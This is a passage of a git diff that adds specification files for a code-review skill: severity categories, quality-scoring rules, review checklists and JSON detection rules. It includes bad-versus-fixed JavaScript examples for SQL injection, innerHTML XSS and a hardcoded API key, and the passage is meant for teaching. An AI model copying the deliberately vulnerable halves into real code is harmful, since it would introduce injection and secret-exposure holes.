|
||||
| `type-safety` | 类型安全问题 | Medium |
|
||||
| `logic-error` | 逻辑错误 | Critical/High |
|
||||
| `resource-leak` | 资源泄漏 | High |
|
||||
|
||||
#### Security Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `injection` | 注入风险 (SQL/Command) | Critical |
|
||||
| `xss` | 跨站脚本风险 | Critical |
|
||||
| `hardcoded-secret` | 硬编码密钥 | Critical |
|
||||
| `auth` | 认证授权问题 | High |
|
||||
| `sensitive-data` | 敏感数据暴露 | High |
|
||||
| `insecure-dependency` | 不安全依赖 | Medium |
|
||||
|
||||
#### Performance Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `complexity` | 高算法复杂度 | Medium |
|
||||
| `n+1-query` | N+1 查询问题 | High |
|
||||
| `memory-leak` | 内存泄漏 | High |
|
||||
| `blocking-io` | 阻塞 I/O | Medium |
|
||||
| `inefficient-algorithm` | 低效算法 | Medium |
|
||||
| `missing-cache` | 缺少缓存 | Low |
|
||||
|
||||
#### Readability Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `naming` | 命名问题 | Medium |
|
||||
| `function-length` | 函数过长 | Medium |
|
||||
| `nesting-depth` | 嵌套过深 | Medium |
|
||||
| `comments` | 注释问题 | Low |
|
||||
| `duplication` | 代码重复 | Medium |
|
||||
| `magic-number` | 魔法数字 | Low |
|
||||
|
||||
#### Testing Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `coverage` | 测试覆盖不足 | Medium |
|
||||
| `boundary-test` | 缺少边界测试 | Medium |
|
||||
| `mock-abuse` | Mock 过度使用 | Low |
|
||||
| `test-isolation` | 测试不独立 | Medium |
|
||||
| `flaky-test` | 不稳定测试 | High |
|
||||
|
||||
#### Architecture Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `layer-violation` | 层次违规 | Medium |
|
||||
| `circular-dependency` | 循环依赖 | High |
|
||||
| `coupling` | 耦合过紧 | Medium |
|
||||
| `srp-violation` | 单一职责违规 | Medium |
|
||||
| `god-class` | 上帝类 | High |
|
||||
|
||||
---
|
||||
|
||||
## Finding ID Format
|
||||
|
||||
```
|
||||
{PREFIX}-{NNN}
|
||||
|
||||
Prefixes by Dimension:
|
||||
- CORR: Correctness
|
||||
- SEC: Security
|
||||
- PERF: Performance
|
||||
- READ: Readability
|
||||
- TEST: Testing
|
||||
- ARCH: Architecture
|
||||
|
||||
Examples:
|
||||
- SEC-001: First security finding
|
||||
- CORR-015: 15th correctness finding
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Quality Gates
|
||||
|
||||
| Gate | Condition | Action |
|
||||
|------|-----------|--------|
|
||||
| **Block** | Critical > 0 | 禁止合并 |
|
||||
| **Warn** | High > 0 | 需要审批 |
|
||||
| **Pass** | Critical = 0, High = 0 | 允许合并 |
|
||||
|
||||
### Recommended Thresholds
|
||||
|
||||
| Metric | Ideal | Acceptable | Needs Work |
|
||||
|--------|-------|------------|------------|
|
||||
| Critical | 0 | 0 | Any > 0 |
|
||||
| High | 0 | ≤ 2 | > 2 |
|
||||
| Medium | ≤ 5 | ≤ 10 | > 10 |
|
||||
| Total | ≤ 10 | ≤ 20 | > 20 |
|
||||
214
.claude/skills/review-code/specs/quality-standards.md
Normal file
@@ -0,0 +1,214 @@
|
||||
# Quality Standards
|
||||
|
||||
代码审查质量标准。
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| action-generate-report | 质量评估 | Quality Dimensions |
|
||||
| action-complete | 最终评分 | Quality Gates |
|
||||
|
||||
---
|
||||
|
||||
## Quality Dimensions
|
||||
|
||||
### 1. Completeness (完整性) - 25%
|
||||
|
||||
**评估审查覆盖的完整程度**
|
||||
|
||||
| Score | Criteria |
|
||||
|-------|----------|
|
||||
| 100% | 所有维度审查完成,所有高风险文件检查 |
|
||||
| 80% | 核心维度完成,主要文件检查 |
|
||||
| 60% | 部分维度完成 |
|
||||
| < 60% | 审查不完整 |
|
||||
|
||||
**检查点**:
|
||||
- [ ] 6 个维度全部审查
|
||||
- [ ] 高风险区域重点检查
|
||||
- [ ] 关键文件覆盖
|
||||
|
||||
---
|
||||
|
||||
### 2. Accuracy (准确性) - 25%
|
||||
|
||||
**评估发现问题的准确程度**
|
||||
|
||||
| Score | Criteria |
|
||||
|-------|----------|
|
||||
| 100% | 问题定位准确,分类正确,无误报 |
|
||||
| 80% | 偶有分类偏差,定位准确 |
|
||||
| 60% | 存在误报或漏报 |
|
||||
| < 60% | 准确性差 |
|
||||
|
||||
**检查点**:
|
||||
- [ ] 问题行号准确
|
||||
- [ ] 严重程度合理
|
||||
- [ ] 分类正确
|
||||
|
||||
---
|
||||
|
||||
### 3. Actionability (可操作性) - 25%
|
||||
|
||||
**评估建议的实用程度**
|
||||
|
||||
| Score | Criteria |
|
||||
|-------|----------|
|
||||
| 100% | 每个问题都有具体可执行的修复建议 |
|
||||
| 80% | 大部分问题有清晰建议 |
|
||||
| 60% | 建议较笼统 |
|
||||
| < 60% | 缺乏可操作建议 |
|
||||
|
||||
**检查点**:
|
||||
- [ ] 提供具体修复建议
|
||||
- [ ] 包含代码示例
|
||||
- [ ] 说明修复优先级
|
||||
|
||||
---
|
||||
|
||||
### 4. Consistency (一致性) - 25%
|
||||
|
||||
**评估审查标准的一致程度**
|
||||
|
||||
| Score | Criteria |
|
||||
|-------|----------|
|
||||
| 100% | 相同问题相同处理,标准统一 |
|
||||
| 80% | 基本一致,偶有差异 |
|
||||
| 60% | 标准不太统一 |
|
||||
| < 60% | 标准混乱 |
|
||||
|
||||
**检查点**:
|
||||
- [ ] ID 格式统一
|
||||
- [ ] 严重程度标准一致
|
||||
- [ ] 描述风格统一
|
||||
|
||||
---
|
||||
|
||||
## Quality Gates
|
||||
|
||||
### Review Quality Gate
|
||||
|
||||
| Gate | Overall Score | Action |
|
||||
|------|---------------|--------|
|
||||
| **Excellent** | ≥ 90% | 高质量审查 |
|
||||
| **Good** | ≥ 80% | 合格审查 |
|
||||
| **Acceptable** | ≥ 70% | 基本可接受 |
|
||||
| **Needs Improvement** | < 70% | 需要改进 |
|
||||
|
||||
### Code Quality Gate (Based on Findings)
|
||||
|
||||
| Gate | Condition | Recommendation |
|
||||
|------|-----------|----------------|
|
||||
| **Block** | Critical > 0 | 禁止合并,必须修复 |
|
||||
| **Warn** | High > 3 | 需要团队讨论 |
|
||||
| **Caution** | Medium > 10 | 建议改进 |
|
||||
| **Pass** | 其他 | 可以合并 |
|
||||
|
||||
---
|
||||
|
||||
## Report Quality Checklist
|
||||
|
||||
### Structure
|
||||
|
||||
- [ ] 包含审查概览
|
||||
- [ ] 包含问题统计
|
||||
- [ ] 包含高风险区域
|
||||
- [ ] 包含问题详情
|
||||
- [ ] 包含修复建议
|
||||
|
||||
### Content
|
||||
|
||||
- [ ] 问题描述清晰
|
||||
- [ ] 文件位置准确
|
||||
- [ ] 代码片段有效
|
||||
- [ ] 修复建议具体
|
||||
- [ ] 优先级明确
|
||||
|
||||
### Format
|
||||
|
||||
- [ ] Markdown 格式正确
|
||||
- [ ] 表格对齐
|
||||
- [ ] 代码块语法正确
|
||||
- [ ] 链接有效
|
||||
- [ ] 无拼写错误
|
||||
|
||||
---
|
||||
|
||||
## Validation Function
|
||||
|
||||
```javascript
|
||||
function validateReviewQuality(state) {
|
||||
const scores = {
|
||||
completeness: 0,
|
||||
accuracy: 0,
|
||||
actionability: 0,
|
||||
consistency: 0
|
||||
};
|
||||
|
||||
// 1. Completeness
|
||||
const dimensionsReviewed = state.reviewed_dimensions?.length || 0;
|
||||
scores.completeness = (dimensionsReviewed / 6) * 100;
|
||||
|
||||
// 2. Accuracy (需要人工验证或后续反馈)
|
||||
// 暂时基于有无错误来估算
|
||||
scores.accuracy = state.error_count === 0 ? 100 : Math.max(0, 100 - state.error_count * 20);
|
||||
|
||||
// 3. Actionability
|
||||
const findings = Object.values(state.findings).flat();
|
||||
const withRecommendations = findings.filter(f => f.recommendation).length;
|
||||
scores.actionability = findings.length > 0
|
||||
? (withRecommendations / findings.length) * 100
|
||||
: 100;
|
||||
|
||||
// 4. Consistency (检查 ID 格式等)
|
||||
const validIds = findings.filter(f => /^(CORR|SEC|PERF|READ|TEST|ARCH)-\d{3}$/.test(f.id)).length;
|
||||
scores.consistency = findings.length > 0
|
||||
? (validIds / findings.length) * 100
|
||||
: 100;
|
||||
|
||||
// Overall
|
||||
const overall = (
|
||||
scores.completeness * 0.25 +
|
||||
scores.accuracy * 0.25 +
|
||||
scores.actionability * 0.25 +
|
||||
scores.consistency * 0.25
|
||||
);
|
||||
|
||||
return {
|
||||
scores,
|
||||
overall,
|
||||
gate: overall >= 90 ? 'excellent' :
|
||||
overall >= 80 ? 'good' :
|
||||
overall >= 70 ? 'acceptable' : 'needs_improvement'
|
||||
};
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Improvement Recommendations
|
||||
|
||||
### If Completeness is Low
|
||||
|
||||
- 增加扫描的文件范围
|
||||
- 确保所有维度都被审查
|
||||
- 重点关注高风险区域
|
||||
|
||||
### If Accuracy is Low
|
||||
|
||||
- 提高规则精度
|
||||
- 减少误报
|
||||
- 验证行号准确性
|
||||
|
||||
### If Actionability is Low
|
||||
|
||||
- 为每个问题添加修复建议
|
||||
- 提供代码示例
|
||||
- 说明修复步骤
|
||||
|
||||
### If Consistency is Low
|
||||
|
||||
- 统一 ID 格式
|
||||
- 标准化严重程度判定
|
||||
- 使用模板化描述
|
||||
337
.claude/skills/review-code/specs/review-dimensions.md
Normal file
@@ -0,0 +1,337 @@
|
||||
# Review Dimensions
|
||||
|
||||
代码审查维度定义和检查点规范。
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| action-deep-review | 获取维度检查规则 | All |
|
||||
| action-generate-report | 维度名称映射 | Dimension Names |
|
||||
|
||||
---
|
||||
|
||||
## Dimension Overview
|
||||
|
||||
| Dimension | Weight | Focus | Key Indicators |
|
||||
|-----------|--------|-------|----------------|
|
||||
| **Correctness** | 25% | 功能正确性 | 边界条件、错误处理、类型安全 |
|
||||
| **Security** | 25% | 安全风险 | 注入攻击、敏感数据、权限 |
|
||||
| **Performance** | 15% | 执行效率 | 算法复杂度、资源使用 |
|
||||
| **Readability** | 15% | 可维护性 | 命名、结构、注释 |
|
||||
| **Testing** | 10% | 测试质量 | 覆盖率、边界测试 |
|
||||
| **Architecture** | 10% | 架构一致性 | 分层、依赖、模式 |
|
||||
|
||||
---
|
||||
|
||||
## 1. Correctness (正确性)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **边界条件处理**
|
||||
- 空数组/空字符串
|
||||
- Null/Undefined
|
||||
- 数值边界 (0, 负数, MAX_INT)
|
||||
- 集合边界 (首元素, 末元素)
|
||||
|
||||
- [ ] **错误处理**
|
||||
- Try-catch 覆盖
|
||||
- 错误不被静默吞掉
|
||||
- 错误信息有意义
|
||||
- 资源正确释放
|
||||
|
||||
- [ ] **类型安全**
|
||||
- 类型转换正确
|
||||
- 避免隐式转换
|
||||
- TypeScript strict mode
|
||||
|
||||
- [ ] **逻辑完整性**
|
||||
- If-else 分支完整
|
||||
- Switch 有 default
|
||||
- 循环终止条件正确
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: 未检查 null
|
||||
function getName(user) {
|
||||
return user.name.toUpperCase(); // user 可能为 null
|
||||
}
|
||||
|
||||
// ✅ 修复
|
||||
function getName(user) {
|
||||
return user?.name?.toUpperCase() ?? 'Unknown';
|
||||
}
|
||||
|
||||
// ❌ 问题: 空 catch 块
|
||||
try {
|
||||
await fetchData();
|
||||
} catch (e) {} // 错误被静默吞掉
|
||||
|
||||
// ✅ 修复
|
||||
try {
|
||||
await fetchData();
|
||||
} catch (e) {
|
||||
console.error('Failed to fetch data:', e);
|
||||
throw e;
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 2. Security (安全性)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **注入防护**
|
||||
- SQL 注入 (使用参数化查询)
|
||||
- XSS (避免 innerHTML)
|
||||
- 命令注入 (避免 exec)
|
||||
- 路径遍历
|
||||
|
||||
- [ ] **认证授权**
|
||||
- 权限检查完整
|
||||
- Token 验证
|
||||
- Session 管理
|
||||
|
||||
- [ ] **敏感数据**
|
||||
- 无硬编码密钥
|
||||
- 日志不含敏感信息
|
||||
- 传输加密
|
||||
|
||||
- [ ] **依赖安全**
|
||||
- 无已知漏洞依赖
|
||||
- 版本锁定
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: SQL 注入风险
|
||||
const query = `SELECT * FROM users WHERE id = ${userId}`;
|
||||
|
||||
// ✅ 修复: 参数化查询
|
||||
const query = `SELECT * FROM users WHERE id = ?`;
|
||||
db.query(query, [userId]);
|
||||
|
||||
// ❌ 问题: XSS 风险
|
||||
element.innerHTML = userInput;
|
||||
|
||||
// ✅ 修复
|
||||
element.textContent = userInput;
|
||||
|
||||
// ❌ 问题: 硬编码密钥
|
||||
const apiKey = 'sk-xxxxxxxxxxxx';
|
||||
|
||||
// ✅ 修复
|
||||
const apiKey = process.env.API_KEY;
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Performance (性能)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **算法复杂度**
|
||||
- 避免 O(n²) 在大数据集
|
||||
- 使用合适的数据结构
|
||||
- 避免不必要的循环
|
||||
|
||||
- [ ] **I/O 效率**
|
||||
- 批量操作 vs 循环单条
|
||||
- 避免 N+1 查询
|
||||
- 适当使用缓存
|
||||
|
||||
- [ ] **资源使用**
|
||||
- 内存泄漏
|
||||
- 连接池使用
|
||||
- 大文件流式处理
|
||||
|
||||
- [ ] **异步处理**
|
||||
- 并行 vs 串行
|
||||
- Promise.all 使用
|
||||
- 避免阻塞
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: N+1 查询
|
||||
for (const user of users) {
|
||||
const posts = await db.query('SELECT * FROM posts WHERE user_id = ?', [user.id]);
|
||||
}
|
||||
|
||||
// ✅ 修复: 批量查询
|
||||
const userIds = users.map(u => u.id);
|
||||
const posts = await db.query('SELECT * FROM posts WHERE user_id IN (?)', [userIds]);
|
||||
|
||||
// ❌ 问题: 串行执行可并行操作
|
||||
const a = await fetchA();
|
||||
const b = await fetchB();
|
||||
const c = await fetchC();
|
||||
|
||||
// ✅ 修复: 并行执行
|
||||
const [a, b, c] = await Promise.all([fetchA(), fetchB(), fetchC()]);
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. Readability (可读性)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **命名规范**
|
||||
- 变量名见名知意
|
||||
- 函数名表达动作
|
||||
- 常量使用 UPPER_CASE
|
||||
- 避免缩写和单字母
|
||||
|
||||
- [ ] **函数设计**
|
||||
- 单一职责
|
||||
- 长度 < 50 行
|
||||
- 参数 < 5 个
|
||||
- 嵌套 < 4 层
|
||||
|
||||
- [ ] **代码组织**
|
||||
- 逻辑分组
|
||||
- 空行分隔
|
||||
- Import 顺序
|
||||
|
||||
- [ ] **注释质量**
|
||||
- 解释 WHY 而非 WHAT
|
||||
- 及时更新
|
||||
- 无冗余注释
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: 命名不清晰
|
||||
const d = new Date();
|
||||
const a = users.filter(x => x.s === 'active');
|
||||
|
||||
// ✅ 修复
|
||||
const currentDate = new Date();
|
||||
const activeUsers = users.filter(user => user.status === 'active');
|
||||
|
||||
// ❌ 问题: 函数过长、职责过多
|
||||
function processOrder(order) {
|
||||
// ... 200 行代码,包含验证、计算、保存、通知
|
||||
}
|
||||
|
||||
// ✅ 修复: 拆分职责
|
||||
function validateOrder(order) { /* ... */ }
|
||||
function calculateTotal(order) { /* ... */ }
|
||||
function saveOrder(order) { /* ... */ }
|
||||
function notifyCustomer(order) { /* ... */ }
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. Testing (测试)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **测试覆盖**
|
||||
- 核心逻辑有测试
|
||||
- 边界条件有测试
|
||||
- 错误路径有测试
|
||||
|
||||
- [ ] **测试质量**
|
||||
- 测试独立
|
||||
- 断言明确
|
||||
- Mock 适度
|
||||
|
||||
- [ ] **测试可维护性**
|
||||
- 命名清晰
|
||||
- 结构统一
|
||||
- 避免重复
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: 测试不独立
|
||||
let counter = 0;
|
||||
test('increment', () => {
|
||||
counter++; // 依赖外部状态
|
||||
expect(counter).toBe(1);
|
||||
});
|
||||
|
||||
// ✅ 修复: 每个测试独立
|
||||
test('increment', () => {
|
||||
const counter = new Counter();
|
||||
counter.increment();
|
||||
expect(counter.value).toBe(1);
|
||||
});
|
||||
|
||||
// ❌ 问题: 缺少边界测试
|
||||
test('divide', () => {
|
||||
expect(divide(10, 2)).toBe(5);
|
||||
});
|
||||
|
||||
// ✅ 修复: 包含边界情况
|
||||
test('divide by zero throws', () => {
|
||||
expect(() => divide(10, 0)).toThrow();
|
||||
});
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. Architecture (架构)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **分层结构**
|
||||
- 层次清晰
|
||||
- 依赖方向正确
|
||||
- 无循环依赖
|
||||
|
||||
- [ ] **模块化**
|
||||
- 高内聚低耦合
|
||||
- 接口定义清晰
|
||||
- 职责单一
|
||||
|
||||
- [ ] **设计模式**
|
||||
- 使用合适的模式
|
||||
- 避免过度设计
|
||||
- 遵循项目既有模式
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: 层次混乱 (Controller 直接操作数据库)
|
||||
class UserController {
|
||||
async getUser(req, res) {
|
||||
const user = await db.query('SELECT * FROM users WHERE id = ?', [req.params.id]);
|
||||
res.json(user);
|
||||
}
|
||||
}
|
||||
|
||||
// ✅ 修复: 分层清晰
|
||||
class UserController {
|
||||
constructor(private userService: UserService) {}
|
||||
|
||||
async getUser(req, res) {
|
||||
const user = await this.userService.findById(req.params.id);
|
||||
res.json(user);
|
||||
}
|
||||
}
|
||||
|
||||
// ❌ 问题: 循环依赖
|
||||
// moduleA.ts
|
||||
import { funcB } from './moduleB';
|
||||
// moduleB.ts
|
||||
import { funcA } from './moduleA';
|
||||
|
||||
// ✅ 修复: 提取共享模块或使用依赖注入
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Severity Mapping
|
||||
|
||||
| Severity | Criteria |
|
||||
|----------|----------|
|
||||
| **Critical** | 安全漏洞、数据损坏风险、崩溃风险 |
|
||||
| **High** | 功能缺陷、性能严重问题、重要边界未处理 |
|
||||
| **Medium** | 代码质量问题、可维护性问题 |
|
||||
| **Low** | 风格问题、优化建议 |
|
||||
| **Info** | 信息性建议、学习机会 |
|
||||
@@ -0,0 +1,63 @@
|
||||
{
|
||||
"dimension": "architecture",
|
||||
"prefix": "ARCH",
|
||||
"description": "Rules for detecting architecture issues including coupling, layering, and design patterns",
|
||||
"rules": [
|
||||
{
|
||||
"id": "circular-dependency",
|
||||
"category": "dependency",
|
||||
"severity": "high",
|
||||
"pattern": "import\\s+.*from\\s+['\"]\\.\\..*['\"]",
|
||||
"patternType": "regex",
|
||||
"contextPattern": "export.*import.*from.*same-module",
|
||||
"description": "Potential circular dependency detected. Circular imports cause initialization issues and tight coupling",
|
||||
"recommendation": "Extract shared code to a separate module, use dependency injection, or restructure the dependency graph",
|
||||
"fixExample": "// Before - A imports B, B imports A\n// moduleA.ts\nimport { funcB } from './moduleB';\nexport const funcA = () => funcB();\n\n// moduleB.ts\nimport { funcA } from './moduleA'; // circular!\n\n// After - extract shared logic\n// shared.ts\nexport const sharedLogic = () => { ... };\n\n// moduleA.ts\nimport { sharedLogic } from './shared';"
|
||||
},
|
||||
{
|
||||
"id": "god-class",
|
||||
"category": "single-responsibility",
|
||||
"severity": "high",
|
||||
"pattern": "class\\s+\\w+\\s*\\{",
|
||||
"patternType": "regex",
|
||||
"methodThreshold": 15,
|
||||
"lineThreshold": 300,
|
||||
"description": "Class with too many methods or lines violates single responsibility principle",
|
||||
"recommendation": "Split into smaller, focused classes. Each class should have one reason to change",
|
||||
"fixExample": "// Before - UserManager handles everything\nclass UserManager {\n createUser() { ... }\n updateUser() { ... }\n sendEmail() { ... }\n generateReport() { ... }\n validatePassword() { ... }\n}\n\n// After - separated concerns\nclass UserRepository { create, update, delete }\nclass EmailService { sendEmail }\nclass ReportGenerator { generate }\nclass PasswordValidator { validate }"
|
||||
},
|
||||
{
|
||||
"id": "layer-violation",
|
||||
"category": "layering",
|
||||
"severity": "high",
|
||||
"pattern": "import.*(?:repository|database|sql|prisma|mongoose).*from",
|
||||
"patternType": "regex",
|
||||
"contextPath": ["controller", "handler", "route", "component"],
|
||||
"description": "Direct database access from presentation layer violates layered architecture",
|
||||
"recommendation": "Access data through service/use-case layer. Keep controllers thin and delegate to services",
|
||||
"fixExample": "// Before - controller accesses DB directly\nimport { prisma } from './database';\nconst getUsers = async () => prisma.user.findMany();\n\n// After - use service layer\nimport { userService } from './services';\nconst getUsers = async () => userService.getAll();"
|
||||
},
|
||||
{
|
||||
"id": "missing-interface",
|
||||
"category": "abstraction",
|
||||
"severity": "medium",
|
||||
"pattern": "new\\s+\\w+Service\\(|new\\s+\\w+Repository\\(",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["interface", "implements", "inject"],
|
||||
"description": "Direct instantiation of services/repositories creates tight coupling",
|
||||
"recommendation": "Define interfaces and use dependency injection for loose coupling and testability",
|
||||
"fixExample": "// Before - tight coupling\nclass OrderService {\n private repo = new OrderRepository();\n}\n\n// After - loose coupling\ninterface IOrderRepository {\n findById(id: string): Promise<Order>;\n}\n\nclass OrderService {\n constructor(private repo: IOrderRepository) {}\n}"
|
||||
},
|
||||
{
|
||||
"id": "mixed-concerns",
|
||||
"category": "separation-of-concerns",
|
||||
"severity": "medium",
|
||||
"pattern": "fetch\\s*\\(|axios\\.|http\\.",
|
||||
"patternType": "regex",
|
||||
"contextPath": ["component", "view", "page"],
|
||||
"description": "Network calls in UI components mix data fetching with presentation",
|
||||
"recommendation": "Extract data fetching to hooks, services, or state management layer",
|
||||
"fixExample": "// Before - fetch in component\nfunction UserList() {\n const [users, setUsers] = useState([]);\n useEffect(() => {\n fetch('/api/users').then(r => r.json()).then(setUsers);\n }, []);\n}\n\n// After - custom hook\nfunction useUsers() {\n return useQuery('users', () => userService.getAll());\n}\n\nfunction UserList() {\n const { data: users } = useUsers();\n}"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -0,0 +1,60 @@
|
||||
{
|
||||
"dimension": "correctness",
|
||||
"prefix": "CORR",
|
||||
"description": "Rules for detecting logical errors, null handling, and error handling issues",
|
||||
"rules": [
|
||||
{
|
||||
"id": "null-check",
|
||||
"category": "null-check",
|
||||
"severity": "high",
|
||||
"pattern": "\\w+\\.\\w+(?!\\.?\\?)",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["\\?\\.", "if\\s*\\(", "!==?\\s*null", "!==?\\s*undefined", "&&\\s*\\w+\\."],
|
||||
"description": "Property access without null/undefined check may cause runtime errors",
|
||||
"recommendation": "Add null/undefined check before accessing properties using optional chaining or conditional checks",
|
||||
"fixExample": "// Before\nobj.property.value\n\n// After\nobj?.property?.value\n// or\nif (obj && obj.property) { obj.property.value }"
|
||||
},
|
||||
{
|
||||
"id": "empty-catch",
|
||||
"category": "empty-catch",
|
||||
"severity": "high",
|
||||
"pattern": "catch\\s*\\([^)]*\\)\\s*\\{\\s*\\}",
|
||||
"patternType": "regex",
|
||||
"description": "Empty catch block silently swallows errors, hiding bugs and making debugging difficult",
|
||||
"recommendation": "Log the error, rethrow it, or handle it appropriately. Never silently ignore exceptions",
|
||||
"fixExample": "// Before\ncatch (e) { }\n\n// After\ncatch (e) {\n console.error('Operation failed:', e);\n throw e; // or handle appropriately\n}"
|
||||
},
|
||||
{
|
||||
"id": "unreachable-code",
|
||||
"category": "unreachable-code",
|
||||
"severity": "medium",
|
||||
"pattern": "return\\s+[^;]+;\\s*\\n\\s*[^}\\s]",
|
||||
"patternType": "regex",
|
||||
"description": "Code after return statement is unreachable and will never execute",
|
||||
"recommendation": "Remove unreachable code or restructure the logic to ensure all code paths are accessible",
|
||||
"fixExample": "// Before\nfunction example() {\n return value;\n doSomething(); // unreachable\n}\n\n// After\nfunction example() {\n doSomething();\n return value;\n}"
|
||||
},
|
||||
{
|
||||
"id": "array-index-unchecked",
|
||||
"category": "boundary-check",
|
||||
"severity": "high",
|
||||
"pattern": "\\[\\d+\\]|\\[\\w+\\](?!\\s*[!=<>])",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["\\.length", "Array\\.isArray", "\\?.\\["],
|
||||
"description": "Array index access without boundary check may cause undefined access or out-of-bounds errors",
|
||||
"recommendation": "Check array length or use optional chaining before accessing array elements",
|
||||
"fixExample": "// Before\nconst item = arr[index];\n\n// After\nconst item = arr?.[index];\n// or\nconst item = index < arr.length ? arr[index] : defaultValue;"
|
||||
},
|
||||
{
|
||||
"id": "comparison-type-coercion",
|
||||
"category": "type-safety",
|
||||
"severity": "medium",
|
||||
"pattern": "[^!=]==[^=]|[^!]==[^=]",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["===", "!=="],
|
||||
"description": "Using == instead of === can lead to unexpected type coercion",
|
||||
"recommendation": "Use strict equality (===) to avoid implicit type conversion",
|
||||
"fixExample": "// Before\nif (value == null)\nif (a == b)\n\n// After\nif (value === null || value === undefined)\nif (a === b)"
|
||||
}
|
||||
]
|
||||
}
|
||||
140
.claude/skills/review-code/specs/rules/index.md
Normal file
@@ -0,0 +1,140 @@
|
||||
# Code Review Rules Index
|
||||
|
||||
This directory contains externalized review rules for the multi-dimensional code review skill.
|
||||
|
||||
## Directory Structure
|
||||
|
||||
```
|
||||
rules/
|
||||
├── index.md # This file
|
||||
├── correctness-rules.json # CORR - Logic and error handling
|
||||
├── security-rules.json # SEC - Security vulnerabilities
|
||||
├── performance-rules.json # PERF - Performance issues
|
||||
├── readability-rules.json # READ - Code clarity
|
||||
├── testing-rules.json # TEST - Test quality
|
||||
└── architecture-rules.json # ARCH - Design patterns
|
||||
```
|
||||
|
||||
## Rule File Schema
|
||||
|
||||
Each rule file follows this JSON schema:
|
||||
|
||||
```json
|
||||
{
|
||||
"dimension": "string", // Dimension identifier
|
||||
"prefix": "string", // Finding ID prefix (4 chars)
|
||||
"description": "string", // Dimension description
|
||||
"rules": [
|
||||
{
|
||||
"id": "string", // Unique rule identifier
|
||||
"category": "string", // Rule category within dimension
|
||||
"severity": "critical|high|medium|low",
|
||||
"pattern": "string", // Detection pattern
|
||||
"patternType": "regex|includes|ast",
|
||||
"negativePatterns": [], // Patterns that exclude matches
|
||||
"caseInsensitive": false, // For regex patterns
|
||||
"contextPattern": "", // Additional context requirement
|
||||
"contextPath": [], // Path patterns for context
|
||||
"lineThreshold": 0, // For size-based rules
|
||||
"methodThreshold": 0, // For complexity rules
|
||||
"description": "string", // Issue description
|
||||
"recommendation": "string", // How to fix
|
||||
"fixExample": "string" // Code example
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
## Dimension Summary
|
||||
|
||||
| Dimension | Prefix | Rules | Focus Areas |
|
||||
|-----------|--------|-------|-------------|
|
||||
| Correctness | CORR | 5 | Null checks, error handling, type safety |
|
||||
| Security | SEC | 5 | XSS, injection, secrets, crypto |
|
||||
| Performance | PERF | 5 | Complexity, I/O, memory leaks |
|
||||
| Readability | READ | 5 | Naming, length, nesting, magic values |
|
||||
| Testing | TEST | 5 | Assertions, coverage, mock quality |
|
||||
| Architecture | ARCH | 5 | Dependencies, layering, coupling |
|
||||
|
||||
## Severity Levels
|
||||
|
||||
| Severity | Description | Action |
|
||||
|----------|-------------|--------|
|
||||
| **critical** | Security vulnerability or data loss risk | Must fix before release |
|
||||
| **high** | Bug or significant quality issue | Fix in current sprint |
|
||||
| **medium** | Code smell or maintainability concern | Plan to address |
|
||||
| **low** | Style or minor improvement | Address when convenient |
|
||||
|
||||
## Pattern Types
|
||||
|
||||
### regex
|
||||
Standard regular expression pattern. Supports flags via `caseInsensitive`.
|
||||
|
||||
```json
|
||||
{
|
||||
"pattern": "catch\\s*\\([^)]*\\)\\s*\\{\\s*\\}",
|
||||
"patternType": "regex"
|
||||
}
|
||||
```
|
||||
|
||||
### includes
|
||||
Simple substring match. Faster than regex for literal strings.
|
||||
|
||||
```json
|
||||
{
|
||||
"pattern": "innerHTML",
|
||||
"patternType": "includes"
|
||||
}
|
||||
```
|
||||
|
||||
### ast (Future)
|
||||
AST-based detection for complex structural patterns.
|
||||
|
||||
```json
|
||||
{
|
||||
"pattern": "function[params>5]",
|
||||
"patternType": "ast"
|
||||
}
|
||||
```
|
||||
|
||||
## Usage in Code
|
||||
|
||||
```javascript
|
||||
// Load rules
|
||||
const rules = JSON.parse(fs.readFileSync('correctness-rules.json'));
|
||||
|
||||
// Apply rules
|
||||
for (const rule of rules.rules) {
|
||||
const matches = detectByPattern(content, rule.pattern, rule.patternType);
|
||||
for (const match of matches) {
|
||||
// Check negative patterns
|
||||
